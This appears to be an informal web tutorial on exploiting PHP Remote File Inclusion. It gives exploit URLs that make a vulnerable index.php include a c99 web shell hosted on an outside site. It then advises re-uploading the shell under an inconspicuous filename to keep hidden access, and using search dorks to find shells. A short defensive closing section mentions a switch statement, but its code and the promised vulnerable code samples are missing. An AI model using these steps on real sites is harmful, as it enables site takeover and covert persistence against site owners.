RFI (Remote File Inclusion)

Remote File Inclusion is a method used to gain full access to a website. The exploit relies on the PHP Include() function. Sites using this function will usually have links similar to
 

If this isn't coded properly, the script doesn't check where the file is coming from and so an inclusion from another site will be accepted and run on the server. This means that a text file containing PHP script can be hosted on another site but run on the site being targeted.

Now this is where web shells come in. A web shell is script that can handle simple tasks such as uploading, deleting and executing commands (such as SQL). The most common shell being the c99 but others are available such as the r57 and c100. This basically means that if you get a web shell to execute on an unprotected site, you will have full control over that site - and will be able to upload or delete any file you wish.

There are 2 types of php code vulnerable to this, and each requires a slightly different method, you don't really know which method is being used, so you simply try both methods. The vulnerable php codes are as follows:

How to do this

If you have found a vulnerable site, this is how to exploit it. Firstly you need to upload your shell to your own website as a text file. For this I will use www.site.com/c99.txt . Then all you do is simply put this link at the end of you vulnerable site. I will use www.example.com . So the final strings to run the web shell are:


www.example.com/index.php?file=https://www.site.com/c99.txt

and www.example.com/index.php?file=https://www.site.com/c99.txt? (the question mark should be at the end)



This will execute in the PHP like so:

Example1:

include('https://www.site.com/c99.txt');

Example2:

include('https://www.site.com/c99.txt?.php');

Which includes the web shells script in the page.

Have Access?


If you have a web shell on the site, but want to make sure you still have access if the owner changes the php script you could upload your shell to their site. Save the text file to your computer and rename it from .txt to .php then simply upload it using the shell you already have on the site (www.site.com/index.php?file=https://www.site.com/c99.txt ?)

But be sure to name it something that is less obvious to the site owner than c99.php so that it looks like it is part of his site. Look around at the names of his pages.

What a shell looks like


This shell below doesn't actually work.  But if you are using a c99 shell and are successful you will be displayed with a page that looks like this: c99.php

notice at the top it says:  Safe-mode: OFF (not secure)

and below upload, and make file it says:

[ ok ]

This means that you would have complete control over the site. A few google dorks can easily find you a real shell though since this is so popular at the moment.

Protect your site

Want to still use the index.php?file= but make sure your site isn't vulnerable to rfi? no problem, just use the "switch" statement (like this site uses) that defines the pages before hand. The code is shown below.